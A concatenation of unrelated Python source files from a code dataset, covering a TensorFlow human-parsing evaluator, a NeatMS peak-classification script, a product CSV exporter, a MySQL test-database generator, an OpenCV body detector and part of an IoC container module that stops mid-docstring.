argparse\n\nN_CLASSES = 20\n# DATA_DIRECTORY = './datasets/examples'\n# DATA_LIST_PATH = './datasets/examples/list/val.txt'\nDATA_DIRECTORY = './datasets/outfit-transfer'\nDATA_LIST_PATH = './datasets/outfit-transfer/tina_list.txt'\nRESTORE_FROM = './checkpoint/JPPNet-s2'\nOUTPUT_DIR = './output/parsing/val'\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Evaluate parsing\")\n parser.add_argument(\"-d\", \"--data_directory\", help=\"Directory containing images.\", default=DATA_DIRECTORY)\n parser.add_argument(\"-l\", \"--data_list\", help=\".txt file containing list of images to evaluate.\", default=DATA_LIST_PATH)\n parser.add_argument(\"-o\", \"--output_directory\", help=\"Directory containing images.\", default=OUTPUT_DIR)\n parser.add_argument(\"-a\", \"--all_steps\", action=\"store_true\", help=\"Run all images instead of number of steps\")\n parser.add_argument(\"-s\", \"--steps\", type=int, help=\"Number of steps to run, instead of the whole directory\")\n parser.add_argument(\"--size\", type=int, help=\"Input size\")\n parser.add_argument(\"-v\", \"--visualize_step\", type=int, help=\"How often to visualize\")\n\n args = parser.parse_args()\n\n\n\n \"\"\"Create the model and start the evaluation process.\"\"\"\n\n # Create queue coordinator.\n coord = tf.train.Coordinator()\n INPUT_SIZE = (args.size, args.size)\n h, w = INPUT_SIZE\n # Load reader.\n with tf.name_scope(\"create_inputs\"):\n reader = ImageReader(args.data_directory, args.data_list, None, False, False, coord)\n image = reader.image\n image_rev = tf.reverse(image, 
tf.stack([1]))\n image_list = reader.image_list\n\n image_batch_origin = tf.stack([image, image_rev])\n image_batch = tf.image.resize_images(image_batch_origin, [int(h), int(w)])\n image_batch075 = tf.image.resize_images(image_batch_origin, [int(h * 0.75), int(w * 0.75)])\n image_batch125 = tf.image.resize_images(image_batch_origin, [int(h * 1.25), int(w * 1.25)])\n\n # Create network.\n with tf.variable_scope('', reuse=False):\n net_100 = JPPNetModel({'data': image_batch}, is_training=False, n_classes=N_CLASSES)\n with tf.variable_scope('', reuse=True):\n net_075 = JPPNetModel({'data': image_batch075}, is_training=False, n_classes=N_CLASSES)\n with tf.variable_scope('', reuse=True):\n net_125 = JPPNetModel({'data': image_batch125}, is_training=False, n_classes=N_CLASSES)\n\n\n # parsing net\n parsing_fea1_100 = net_100.layers['res5d_branch2b_parsing']\n parsing_fea1_075 = net_075.layers['res5d_branch2b_parsing']\n parsing_fea1_125 = net_125.layers['res5d_branch2b_parsing']\n\n parsing_out1_100 = net_100.layers['fc1_human']\n parsing_out1_075 = net_075.layers['fc1_human']\n parsing_out1_125 = net_125.layers['fc1_human']\n\n # pose net\n resnet_fea_100 = net_100.layers['res4b22_relu']\n resnet_fea_075 = net_075.layers['res4b22_relu']\n resnet_fea_125 = net_125.layers['res4b22_relu']\n\n with tf.variable_scope('', reuse=False):\n pose_out1_100, pose_fea1_100 = pose_net(resnet_fea_100, 'fc1_pose')\n pose_out2_100, pose_fea2_100 = pose_refine(pose_out1_100, parsing_out1_100, pose_fea1_100, name='fc2_pose')\n parsing_out2_100, parsing_fea2_100 = parsing_refine(parsing_out1_100, pose_out1_100, parsing_fea1_100, name='fc2_parsing')\n parsing_out3_100, parsing_fea3_100 = parsing_refine(parsing_out2_100, pose_out2_100, parsing_fea2_100, name='fc3_parsing')\n\n with tf.variable_scope('', reuse=True):\n pose_out1_075, pose_fea1_075 = pose_net(resnet_fea_075, 'fc1_pose')\n pose_out2_075, pose_fea2_075 = pose_refine(pose_out1_075, parsing_out1_075, pose_fea1_075, name='fc2_pose')\n parsing_out2_075, parsing_fea2_075 = parsing_refine(parsing_out1_075, pose_out1_075, parsing_fea1_075, name='fc2_parsing')\n parsing_out3_075, parsing_fea3_075 = parsing_refine(parsing_out2_075, pose_out2_075, parsing_fea2_075, name='fc3_parsing')\n\n with tf.variable_scope('', reuse=True):\n pose_out1_125, pose_fea1_125 = pose_net(resnet_fea_125, 'fc1_pose')\n pose_out2_125, pose_fea2_125 = pose_refine(pose_out1_125, parsing_out1_125, pose_fea1_125, name='fc2_pose')\n parsing_out2_125, parsing_fea2_125 = parsing_refine(parsing_out1_125, pose_out1_125, parsing_fea1_125, name='fc2_parsing')\n parsing_out3_125, parsing_fea3_125 = parsing_refine(parsing_out2_125, pose_out2_125, parsing_fea2_125, name='fc3_parsing')\n\n\n parsing_out1 = tf.reduce_mean(tf.stack([tf.image.resize_images(parsing_out1_100, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out1_075, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out1_125, tf.shape(image_batch_origin)[1:3,])]), axis=0)\n parsing_out2 = tf.reduce_mean(tf.stack([tf.image.resize_images(parsing_out2_100, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out2_075, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out2_125, tf.shape(image_batch_origin)[1:3,])]), axis=0)\n parsing_out3 = tf.reduce_mean(tf.stack([tf.image.resize_images(parsing_out3_100, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out3_075, tf.shape(image_batch_origin)[1:3,]),\n tf.image.resize_images(parsing_out3_125, 
tf.shape(image_batch_origin)[1:3,])]), axis=0)\n\n raw_output = tf.reduce_mean(tf.stack([parsing_out1, parsing_out2, parsing_out3]), axis=0)\n head_output, tail_output = tf.unstack(raw_output, num=2, axis=0)\n tail_list = tf.unstack(tail_output, num=20, axis=2)\n tail_list_rev = [None] * 20\n for xx in range(14):\n tail_list_rev[xx] = tail_list[xx]\n tail_list_rev[14] = tail_list[15]\n tail_list_rev[15] = tail_list[14]\n tail_list_rev[16] = tail_list[17]\n tail_list_rev[17] = tail_list[16]\n tail_list_rev[18] = tail_list[19]\n tail_list_rev[19] = tail_list[18]\n tail_output_rev = tf.stack(tail_list_rev, axis=2)\n tail_output_rev = tf.reverse(tail_output_rev, tf.stack([1]))\n\n\n raw_output_all = tf.reduce_mean(tf.stack([head_output, tail_output_rev]), axis=0)\n # expand_dims to the beginning for the \"batch\" dimension\n before_argmax = tf.expand_dims(raw_output_all, dim=0)\n before_glasses = tf.slice(before_argmax, [0,0,0,0], [-1, -1, -1, 4])\n after_glasses = tf.slice(before_argmax, [0,0,0,5], [-1, -1, -1, -1])\n # this is now a 19-channel tensor\n without_glasses = tf.concat((before_glasses, after_glasses), axis=3)\n\n # # take out the background channel\n # seg_18 = before_argmax[:, :, :, 1:]\n # # convert to probability maps\n # seg_18_pmap = tf.nn.softmax(seg_18, axis=3)\n # # keep only the top 3 pmaps, because assume don't need more boundaries than the top 3\n # seg_18_pmap_thin =\n\n\n # AJ: take the argmax of the channel dimension, to determine which clothing\n # label has the highest probabilitye\n argmaxed = tf.argmax(without_glasses, dimension=3)\n # argmax removed dim3, so add it back. Creates a 4d tensor, to make it batch x height x width x color\n pred_all = tf.expand_dims(argmaxed, dim=3)\n\n # Which variables to load.\n restore_var = tf.global_variables()\n # Set up tf session and initialize variables.\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n init = tf.global_variables_initializer()\n\n sess.run(init)\n sess.run(tf.local_variables_initializer())\n\n # Load weights.\n loader = tf.train.Saver(var_list=restore_var)\n if RESTORE_FROM is not None:\n if load(loader, sess, RESTORE_FROM):\n print(\" [*] Load SUCCESS\")\n else:\n print(\" [!] 
Load failed...\")\n\n # Start queue threads.\n threads = tf.train.start_queue_runners(coord=coord, sess=sess)\n\n\n # Iterate over training steps.\n num_steps = args.steps if args.steps else len(image_list) # added by AJ\n t = tqdm(range(num_steps), unit=\"img\")\n for step in t:\n # removes the extension type\n img_id = os.path.splitext(image_list[step])[0]\n img_subpath = get_path_after_texture(img_id)\n\n # make output directory\n os.makedirs(os.path.join(args.output_directory, os.path.dirname(img_subpath)), exist_ok=True)\n\n t.set_description(img_subpath)\n\n # compute the output\n out = sess.run(pred_all)\n # create sparse matrix\n out_sparse = sparse.csc_matrix(np.squeeze(out))\n\n # seg_pmap = sess.run(seg_18_prob_map)\n # seg_pmap[seg_pmap < 0.05] = 0\n\n # save the numpy-array probability map to a file, so we can use it later\n fname = os.path.join(args.output_directory, img_subpath)\n sparse.save_npz(fname, out_sparse)\n # np.save(fname, out)\n\n if args.visualize_step and step % args.visualize_step == 0:\n msk = decode_labels(out)\n parsing_im = Image.fromarray(msk[0])\n parsing_im.save(f'{args.output_directory}/{img_subpath}_vis.png')\n\n coord.request_stop()\n coord.join(threads)\n\ndef get_path_after_texture(img_id):\n sep = os.path.sep\n path_elements = img_id.split(sep)\n tex_ind = path_elements.index(\"texture\")\n path = sep.join(path_elements[tex_ind + 1:])\n return path\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"evaluate_parsing_JPPNet-s2.py","file_name":"evaluate_parsing_JPPNet-s2.py","file_ext":"py","file_size_in_byte":9830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"86278408","text":"import NeatMS as ntms\n\nbase_path = './data/metaclean_testdata2/'\nraw_data_folder_path = base_path + 'mzML/'\n# Using peaks that have been aligned across samples\nfeature_table_path = base_path + 'refined_unaligned_feature_table.csv'\n# Using unaligned peaks (One individual peak table for each sample)\n# feature_table_path = '../data/test_data/unaligned_features/'\n# This is important for NeatMS to read the feature table correctly\ninput_data = 'xcms'\n\nexperiment = ntms.Experiment(raw_data_folder_path, feature_table_path, input_data)\n\nfor sample in experiment.samples:\n print('Sample {} : {} peaks'.format(sample.name,len(sample.feature_list)))\n\nfrom collections import Counter\nexp = experiment\nsizes = []\nprint(\"# Feature collection:\",len(exp.feature_tables[0].feature_collection_list))\n\nfor consensus_feature in exp.feature_tables[0].feature_collection_list:\n sizes.append(len(consensus_feature.feature_list))\n\nc = Counter(sizes)\nprint(\"Number of consensus features:\")\nfor size, count in c.most_common():\n print(\" of size %2d : %6d\" % (size, count))\nprint(\" total : %6d\" % len(exp.feature_tables[0].feature_collection_list))\nnn_handler = ntms.NN_handler(experiment)\nprint('Labels:', nn_handler.get_labels())\n\nmodel_path = \"./data/model/neatms_default_model.h5\"\nnn_handler.create_model(model = model_path)\n\n\n# Set the threshold to 0.22\nthreshold=0.22\n# Run the prediction\nnn_handler.predict_peaks(threshold)\n\nfrom collections import Counter\nexp = experiment\nhq_sizes = []\nlq_sizes = []\nn_sizes = []\nsizes = []\nprint(\"# Feature collection:\",len(exp.feature_tables[0].feature_collection_list))\nfor consensus_feature in exp.feature_tables[0].feature_collection_list:\n hq_size = 0\n lq_size = 0\n n_size = 0\n for feature in consensus_feature.feature_list:\n for peak in 
feature.peak_list:\n            if peak.valid:\n                if peak.prediction.label == \"High_quality\":\n                    hq_size += 1\n                if peak.prediction.label == \"Low_quality\":\n                    lq_size += 1\n                if peak.prediction.label == \"Noise\":\n                    n_size += 1\n\n    hq_sizes.append(hq_size)\n    lq_sizes.append(lq_size)\n    n_sizes.append(n_size)\n    sizes.append(len(consensus_feature.feature_list))\n\nc = Counter(hq_sizes)\nprint(\"\\nNumber of consensus features labeled as 'High quality':\")\nfor size, count in c.most_common():\n    print(\" of size %2d : %6d\" % (size, count))\nprint(\" total : %6d\" % len(exp.feature_tables[0].feature_collection_list))\n\nc = Counter(lq_sizes)\nprint(\"\\nNumber of consensus features labeled as 'Low quality':\")\nfor size, count in c.most_common():\n    print(\" of size %2d : %6d\" % (size, count))\nprint(\" total : %6d\" % len(exp.feature_tables[0].feature_collection_list))\n\nc = Counter(n_sizes)\nprint(\"\\nNumber of consensus features labeled as 'Noise':\")\nfor size, count in c.most_common():\n    print(\" of size %2d : %6d\" % (size, count))\nprint(\" total : %6d\" % len(exp.feature_tables[0].feature_collection_list))\n\nfilename = base_path+'neatms_export.csv'\n\nexperiment.export_csv(filename)\n# We create the dataframe using this function\nNeatMS_output_df = experiment.export_to_dataframe()\n# And display it\nprint(NeatMS_output_df)\n\n\n# We add those specific properties to the export list\n# Default properties will be overwritten, so make sure to add them to the list as well\nexport_properties = [\"rt\", \"mz\", \"height\", \"area\", \"label\", \"peak_rt_start\", \"peak_rt_end\"]\n\n# Here is the full list of available properties that you can export\n# [\"rt\", \"mz\", \"height\", \"area\", \"label\", \"peak_rt_start\", \"peak_rt_end\", \"peak_mz_min\", \"peak_mz_max\", \"area_bc\", \"sn\"]\n\nNeatMS_output_df = experiment.export_to_dataframe(export_properties = export_properties)\n\nprint(NeatMS_output_df)\n\nfilename = base_path+'neatms_export_with_extra_properties.csv'\n\nexperiment.export_csv(filename, export_properties = export_properties)\n\n\n","sub_path":"test_neatms_metacleant2.py","file_name":"test_neatms_metacleant2.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"475535316","text":"# Add current year, month and day to list\nfrom datetime import date\n\nyearToday = date.today().year\nmonth = date.today().month\nday = date.today().day\n\n\nlist1 = []\n\nlist1.append(yearToday)\nlist1.append(month)\nlist1.append(day)\n\nprint(list1)\n","sub_path":"date_to_list.py","file_name":"date_to_list.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"463036798","text":"import os\nimport sys\nimport json\nimport csv\nimport datetime\nimport traceback\n#クラスファイルがスクリプトと同一ディレクトリにないと動かないんだけどなぜ?\nfrom database import Database\nfrom spec_info import *\nfrom content import *\nfrom creation_date import *\nfrom constant import *\nfrom fileserver_connect import *\nfrom logger import *\n# CSV入力/出力設定の読み込み\n\nlog = logger(logger)\n\nlog.info(\"処理を開始します。\")\n\nConnect.fileserver()\n\n#csv_settings.jsonの読み込み\ntry:\n    s5_csv_settings = json.load(open(\".\\\\etc\\\\csv_settings.json\", \"r\"))\n    s5_index = s5_csv_settings[\"s5\"][\"input\"]\nexcept:\n    log.error(\"「csv_settings.json」の読み込み時に例外が発生しました。\")\n    log.error(sys.exc_info())\n    traceback.print_exc()\n    sys.exit(False)\nelse:\n    
log.info(\"「csv_settings.json」を読み込みました。\")\n\n#brand.jsonの読み込み\ntry:\n brand_csv_settings = json.load(open(\".\\\\etc\\\\brand.json\", \"r\" ))\n brand_kana = brand_csv_settings[\"brand\"][\"kana\"]\nexcept:\n log.error(\"「brand.json」の読み込み時に例外が発生しました。\")\n log.error(sys.exc_info())\n traceback.print_exc()\n sys.exit(False)\nelse:\n log.info(\"「brand.json」を読み込みました。\")\n\n# 対象商品一覧CSVを読み込み\ntry:\n csv_file = open(\n \".\\\\s5.csv\", \"r\", encoding=\"shift_jis\", errors=\"\", newline=\"\"\n )\n csv_list = csv.reader(\n csv_file, delimiter=\",\", doublequote=True,\n lineterminator=\"\\r\\n\", quotechar='\"', skipinitialspace=True\n )\nexcept:\n log.error(\"「s5.csv」の読み込み時に例外が発生しました。\")\n log.error(sys.exc_info())\n traceback.print_exc()\n sys.exit(False)\nelse:\n log.info(\"「s5.csv」を読み込みました。\")\n\n#インスタンス化\ndb = Database()\npd = Productdetail()\n\nlog.info(\"「s5.csv」へのデータ出力を開始します。\")\n\nwith open(\".\\\\test.csv\", \"w\", newline=\"\") as test: \n\n i = 1\n # データ抽出/加工\n for line in csv_list:\n\n output_array = []\n #MST_ITEMをselect\n item = db.sql_execute(\"MST_ITEM\", \"ITEM_CODE\", line[s5_index[\"lis_item_code\"]])\n\n #MST_BRANDをselect\n brand = db.sql_execute(\"MST_BRAND\", \"BRAND_CODE\", item[\"BRAND_CODE\"])\n\n #MST_ITEM_INCIDENTAL1をselect\n incidental = db.sql_execute(\"MST_ITEM_INCIDENTAL1\", \"ITEM_CODE\", line[s5_index[\"lis_item_code\"]])\n\n #\n text = pd.create_tagging(item, incidental)\n image_value = Content.image_name_change(int(line[s5_index[\"image_number\"]]), line[s5_index[\"lis_item_code\"]])\n serial_date = Date.date_change(i)\n standard = Date.create_standard(item[\"ITEM_NAME\"], item[\"STANDARD\"])\n\n output_array.extend([\n line[s5_index[\"s5_item_code\"]],\n delivery_code,\n icon_image_code,\n expiration_date,\n classification_code,\n standard,\n brand[\"BRAND_NAME\"],\n serial_date,\n \"\", \n line[s5_index[\"lis_item_code\"]],\n active_gateway,\n text, #LISのデータにHTMLタグ適当につけた\n image_value, #品番の後ろの連番どうする?\n \"\",\n \"\",\n \"\",\n \"\",\n \"%s,%s,%s\" % (brand[\"BRAND_NAME\"], brand_kana[brand[\"BRAND_NAME\"]], line[s5_index[\"lis_item_code\"]]), #ブランドカナ名設定ファイルで取得してる。\n \"\",\n round(item[\"RETAIL\"] * tax),\n \"\",\n \"false\"\n ])\n\n try:\n writer = csv.writer(test, lineterminator=\"\\r\\n\") #quoting=csv.QUOTE_NONE, escapechar=' ', quotechar=' '\n writer.writerow(output_array)\n except:\n log.error(\"「s5.csv」へのデータ出力時に%d行目で例外が発生しました。\" % i)\n log.error(sys.exc_info())\n traceback.print_exc()\n sys.exit(False)\n else:\n log.info(\"%d行目のデータが出力されました。\" % i)\n finally:\n i += 1\n\nlog.info(\"処理が終了しました。\")","sub_path":"bin/create_products_csv_for_s5.py","file_name":"create_products_csv_for_s5.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"115682053","text":"from collections import OrderedDict\nfrom typing import List\nfrom Column import Column\nfrom Table import Table\nfrom Connection import Connection\n\nfrom Model import Model\nfrom DbErrors import DbNoConnection\n\n\nclass Database(Model):\n\n def __init__(self, name: str, main, connection: Connection):\n super().__init__()\n self._name = name\n self.main = main\n self.connection = connection\n self._tables = OrderedDict()\n self._tables_to_gen = set(self._tables.keys())\n self._size = len(self._tables)\n self.test_db_name = 'test_{}'.format(self.name)\n\n @property\n def name(self):\n return self._name\n\n @property\n def tables(self) -> iter:\n return self._tables\n\n def tables_to_gen(self):\n return 
self._tables_to_gen\n\n    def size(self):\n        return len(self._tables)\n\n    def table(self, name: str):\n        return self.tables[name]\n\n    def check_table(self, name: str):\n        if name in self._tables.keys():\n            self._tables_to_gen.add(name)\n        else:\n            raise KeyError\n\n    def uncheck_table(self, name: str):\n        if name in self._tables.keys():\n            self._tables_to_gen.discard(name)\n\n    def update(self):\n        upd_tables = OrderedDict()\n        table_names = self.list_tables()\n\n        for table_name in table_names:\n            if table_name in self._tables:\n                upd_tables[table_name] = self.table(table_name)\n            else:\n                upd_tables[table_name] = Table(\n                    table_name, self, self.connection)\n\n            upd_tables[table_name].update()\n        self._tables = upd_tables\n\n    def list_tables(self):\n        if self.connection.db is None:\n            raise DbNoConnection\n        self.connection.cur.execute(r\"SHOW TABLES FROM `{}`\".format(self.name))\n        data = self.connection.cur.fetchall()\n        tables = (x[0] for x in data)\n        return tables\n\n    def __repr__(self):\n        tables = ''\n        for table_name in self.tables.keys():\n            tables += '\\n\\t{}'.format(self.table(table_name))\n        return 'Database(name={0}, tables:{1})'.format(self.name, tables)\n\n    def create_test_db(self):\n        self.connection.cur.execute(\n            r\"CREATE DATABASE `{}`\".format(self.test_db_name))\n\n    def make_query(self, query):\n        if self.connection.db is None:\n            raise DbNoConnection\n        self.connection.cur.execute(r\"USE `{}`\".format(self.name))\n        print(\"Database: {0}. Query: {1}\".format(self.name, query))\n        self.connection.cur.execute(query)\n\n    def make_gen_query(self, query):\n        if self.connection.db is None:\n            raise DbNoConnection\n        self.connection.cur.execute(r\"USE `{}`\".format(self.test_db_name))\n        print(\"Database: {0}. Query: {1}\".format(self.test_db_name, query))\n        self.connection.cur.execute(query)\n\n    def generate(self):\n        self.create_test_db()\n        self.make_gen_query(\"SET FOREIGN_KEY_CHECKS=0;\")\n        print(\"------------------Create tables------------------\")\n        create_tables = \"\"\n        for table in self.tables.values():\n            create_tables += \"{};\\n\".format(table.create_table_script())\n        print(\"-------------------Tables created----------------\")\n        print(create_tables)\n\n        self.make_gen_query(create_tables)\n        \n        self.connection.db.commit()\n        self.make_gen_query(\"SET FOREIGN_KEY_CHECKS=1;\")\n        self.connection.db.commit()\n        # generate tables with null fkeys\n        for table in self.tables.values():\n            table.generate()\n            self.connection.db.commit()\n        self.connection.db.commit()\n        # update table with values\n        for table in self.tables.values():\n            if not table.fkeys:\n                continue\n            print(table.name + \"FKEY\")\n            table.update_table_fkeys()\n            self.connection.db.commit()\n        self.connection.db.commit()\n","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"118629164","text":"import cv2 \n\n# Pre-trained model\nface_model = cv2.CascadeClassifier('../models/haarcascade_fullbody.xml')\nvideo = cv2.VideoCapture(0)\ncount = 1\nwhile(True):\n    status, frame = video.read()\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    faces = face_model.detectMultiScale(gray, scaleFactor=1.5, minNeighbors=5)\n    for (x, y, w, h) in faces:\n        print('x: %s| y: %s | w: %s| h: %s'%(x,y,w,h))\n        #BGR Color Frame\n        color = (0, 255, 0) \n        rectangle_thickness = 2\n        cv2.rectangle(frame, (x, y), (x+w, y+h), color, rectangle_thickness)\n\n    cv2.imshow('capturing ...', frame)\n    key = cv2.waitKey(3)\n    if key == ord('q'):\n        break\n    
\nvideo.release()\ncv2.destroyAllWindows()\n","sub_path":"detectFace/fullbody.py","file_name":"fullbody.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"206324062","text":"'''\nCreated on Jan 12, 2012\n\n@package: Newscoop\n@copyright: 2011 Sourcefabric o.p.s.\n@license: http://www.gnu.org/licenses/gpl-3.0.txt\n@author: Gabriel Nistor\n\nProvides support functions for the container.\n'''\n\nfrom ..support.util_sys import callerLocals, callerGlobals\nfrom ._impl.aop_container import AOPClasses, AOPResources\nfrom ._impl.entity_handler import Wiring, WireConfig\nfrom ._impl.ioc_setup import ConfigError, register, SetupConfig, setupsOf, \\\n setupFirstOf, SetupStart\nfrom ._impl.support_setup import CreateEntity, SetupError, SetupEntityProxy, \\\n SetupEntityWire, Assembly, CallEntity, SetupEntityCreate\nfrom .aop import classesIn\nfrom ally.container._impl.support_setup import SetupEntityListen, \\\n SetupEntityListenAfterBinding\nfrom copy import deepcopy\nfrom functools import partial\nfrom inspect import isclass, ismodule, getsource\n\n# --------------------------------------------------------------------\n# Functions available in setup modules.\n\ndef createEntitySetup(api, *impl, formatter=lambda group, clazz: group + '.' + clazz.__name__, setupModule=None):\n '''\n Creates entity setup functions for the provided API classes. The name of the setup functions that will be generated\n are formed based on the provided formatter.\n To create a setup function a class from the impl classes has to inherit at least one of the api classes then it will\n create a setup function based on the api class that will create an instance of the impl class. If a impl class\n inherits multiple api classes than for each one of the api class a setup function is generated, all setup function\n will provide the same impl instance. If an api class is already delivered by a different call than no create entity\n setup will made for that implementation, the idea is if you defined a setup function in the setup module that will\n deliver an instance for that api class it means it should not be created again.\n \n @param api: string|class|AOPClasses|tuple(string|class|AOPClasses)|list(string|class|AOPClasses)\n The classes to be considered as the APIs for the setup functions.\n @param impl: arguments(string|class|AOPClasses)\n The classes to be considered the implementations for the APIs.\n @param formatter: Callable\n The formatter to use in creating the entity setup function name, the Callable will take two arguments, first is\n the group where the setup function is defined and second the class for wich the setup is created. 
\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n '''\n assert callable(formatter), 'Invalid formatter %s' % formatter\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n group = setupModule.__name__\n else:\n registry = callerLocals()\n if '__name__' not in registry:\n raise SetupError('The create entity call needs to be made directly from the module')\n group = registry['__name__']\n apis = _classes(api if isinstance(api, (tuple, list)) else [api])\n wireClasses = []\n for clazz in _classes(impl):\n apiClasses = [apiClass for apiClass in apis if issubclass(clazz, apiClass)]\n if apiClasses:\n # We need to trim the API classes to the top ones.\n while True:\n topApis = []\n for k in range(0, len(apiClasses) - 1):\n for j in range(k + 1, len(apiClasses)):\n if issubclass(apiClasses[j], apiClasses[k]): break\n else: topApis.append(apiClasses[k])\n if not topApis: break\n apiClasses = topApis\n\n wireClasses.append(clazz)\n create = CreateEntity(clazz)\n for apiClass in apiClasses:\n register(SetupEntityCreate(create, apiClass, name=formatter(group, apiClass), group=group), registry)\n wireEntities(*wireClasses, setupModule=setupModule)\n\ndef wireEntities(*classes, setupModule=None):\n '''\n Creates entity wiring setups for the provided classes. The wiring setups consists of configurations found in the\n provided classes that will be published in the setup module.\n \n @param classes: arguments(string|class|AOPClasses)\n The classes to be wired.\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n '''\n def processConfig(clazz, wconfig):\n assert isclass(clazz), 'Invalid class %s' % clazz\n assert isinstance(wconfig, WireConfig), 'Invalid wire configuration %s' % wconfig\n value = clazz.__dict__.get(wconfig.name, None)\n if value and not isclass(value): return deepcopy(value)\n if wconfig.hasValue: return deepcopy(wconfig.value)\n raise ConfigError('A configuration value is required for %r in class %r' % (wconfig.name, clazz.__name__))\n\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n group = setupModule.__name__\n else:\n registry = callerLocals()\n if '__name__' not in registry:\n raise SetupError('The create wiring call needs to be made directly from the module')\n group = registry['__name__']\n wirings = {}\n for clazz in _classes(classes):\n wiring = Wiring.wiringOf(clazz)\n if wiring:\n wirings[clazz] = wiring\n assert isinstance(wiring, Wiring)\n for wconfig in wiring.configurations:\n assert isinstance(wconfig, WireConfig)\n name = SetupEntityWire.nameFor(group, clazz, wconfig)\n for setup in setupsOf(registry, SetupConfig):\n assert isinstance(setup, SetupConfig)\n if setup.name == name: break\n else:\n configCall = partial(processConfig, clazz, wconfig)\n configCall.__doc__ = wconfig.description\n register(SetupConfig(configCall, type=wconfig.type, name=name, group=group), registry)\n if wirings:\n wire = setupFirstOf(registry, SetupEntityWire)\n if wire:\n assert isinstance(wire, SetupEntityWire)\n wire.update(wirings)\n else: register(SetupEntityWire(group, wirings), registry)\n\ndef listenToEntities(*classes, listeners=None, setupModule=None, beforeBinding=True):\n '''\n Listens for entities defined in the provided module that are of the provided classes. 
The listening is done at the \n moment of the entity creation so the listen is not dependent of the declared entity return type.\n \n @param classes: arguments(string|class|AOPClasses)\n The classes to listen to, this classes can be either the same class or a super class of the instances generated\n by the entity setup functions.\n @param listeners: None|Callable|list[Callable]|tuple(Callable)\n The listeners to be invoked. The listeners Callable's will take one argument that is the instance.\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n @param beforeBinding: boolean\n Flag indicating that the listening should be performed before any binding occurs (True) or after the\n bindings (False).\n '''\n if not listeners: listeners = []\n elif not isinstance(listeners, (list, tuple)): listeners = [listeners]\n assert isinstance(listeners, (list, tuple)), 'Invalid listeners %s' % listeners\n assert isinstance(beforeBinding, bool), 'Invalid before binding flag %s' % beforeBinding\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n group = setupModule.__name__\n else:\n registry = callerLocals()\n if '__name__' not in registry:\n raise SetupError('The create proxy call needs to be made directly from the module')\n group = registry['__name__']\n\n if beforeBinding: setup = SetupEntityListen(group, _classes(classes), listeners)\n else: setup = SetupEntityListenAfterBinding(group, _classes(classes), listeners)\n register(setup, registry)\n\ndef bindToEntities(*classes, binders=None, setupModule=None):\n '''\n Creates entity implementation proxies for the provided entities classes found in the provided module. The binding is\n done at the moment of the entity creation so the binding is not dependent of the declared entity return type.\n \n @param classes: arguments(string|class|AOPClasses)\n The classes to be proxied.\n @param binders: None|Callable|list[Callable]|tuple(Callable)\n The binders to be invoked when a proxy is created. 
The binders Callable's will take one argument that is the newly\n created proxy instance.\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n '''\n if not binders: binders = []\n elif not isinstance(binders, (list, tuple)): binders = [binders]\n assert isinstance(binders, (list, tuple)), 'Invalid binders %s' % binders\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n group = setupModule.__name__\n else:\n registry = callerLocals()\n if '__name__' not in registry:\n raise SetupError('The create proxy call needs to be made directly from the module')\n group = registry['__name__']\n register(SetupEntityProxy(group, _classes(classes), binders), registry)\n\ndef loadAllEntities(*classes, setupModule=None):\n '''\n Loads all entities that have the type in the provided classes.\n \n @param classes: arguments(string|class|AOPClasses)\n The classes to have the entities loaded for.\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n '''\n def loadAll(prefix, classes):\n for clazz in classes:\n for name, call in Assembly.current().calls.items():\n if name.startswith(prefix) and isinstance(call, CallEntity) and call.type and \\\n (call.type == clazz or issubclass(call.type, clazz)): Assembly.process(name)\n\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n group = setupModule.__name__\n else:\n registry = callerLocals()\n if '__name__' not in registry:\n raise SetupError('The create proxy call needs to be made directly from the module')\n group = registry['__name__']\n\n loader = partial(loadAll, group + '.', _classes(classes))\n register(SetupStart(loader, name='loader_%s' % id(loader)), registry)\n\ndef include(module, setupModule=None):\n '''\n By including the provided module all the setup functions from the the included module are added as belonging to the\n including module, is just like defining the setup functions again in the including module.\n \n @param module: module\n The module to be included.\n @param setupModule: module|None\n If the setup module is not provided than the calling module will be considered.\n '''\n assert ismodule(module), 'Invalid module %s' % module\n\n if setupModule:\n assert ismodule(setupModule), 'Invalid setup module %s' % setupModule\n registry = setupModule.__dict__\n else: registry = callerLocals()\n exec(compile(getsource(module), registry['__file__'], 'exec'), registry)\n\n# --------------------------------------------------------------------\n# Functions available in setup functions calls.\n\ndef entities():\n '''\n !Attention this function is only 